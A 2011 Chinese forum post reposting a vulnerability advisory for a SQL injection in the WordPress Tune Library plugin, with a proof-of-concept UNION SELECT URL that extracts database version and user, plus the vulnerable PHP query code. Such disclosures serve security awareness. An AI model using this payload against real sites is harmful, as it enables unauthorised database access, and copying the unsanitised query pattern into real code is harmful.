鱼C论坛

 找回密码
 立即注册
查看: 3206|回复: 0

WordPress 调库插件 2.17 SQL 注入漏洞

[复制链接]
发表于 2011-10-14 22:13:13 | 显示全部楼层 |阅读模式

马上注册,结交更多好友,享用更多功能^_^

您需要 登录 才可以下载或查看,没有账号?立即注册

x
# 漏洞名称: WordPress Tune Library plugin <= 2.17 SQL Injection Vulnerability
# 日期: 2011-09-10

# 作者: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)

# 软件下载: http://downloads.wordpress.org/plugin/tune-library.zip

# 版本: 1.5.1 (tested)

# 注释: magic_quotes has to be turned off

#        Plugin setting “Filter artists by letter and show alphabetical navigation” has to be turned on

poc:

http://www.91***.org/wp-content/p ... -ajax.php?letter=-1 UNION ALL SELECT CONCAT_WS(CHAR(59),version(),current_user(),database()),2--%20



---------------

Vulnerable code

---------------

$artistletter = $_GET['letter'];

...

if ($options['oneletter'] == false || $showallartists == true)

...

else

{

    if ($artistletter == '#')

    ...

    else

    {

        $querystr ="SELECT distinct artist, 'artist' as source FROM " . $wpdb->prefix . "tracks where artist != '' and artist like '" .$artistletter . "%' order by artist";

    }

评分

参与人数 1鱼币 +4 收起 理由
乐め乐 + 4

查看全部评分

想知道小甲鱼最近在做啥?请访问 -> ilovefishc.com
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|手机版|Archiver|鱼C工作室 ( 粤ICP备18085999号-1 | 粤公网安备 44051102000585号)

GMT+8, 2024-12-23 07:58

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表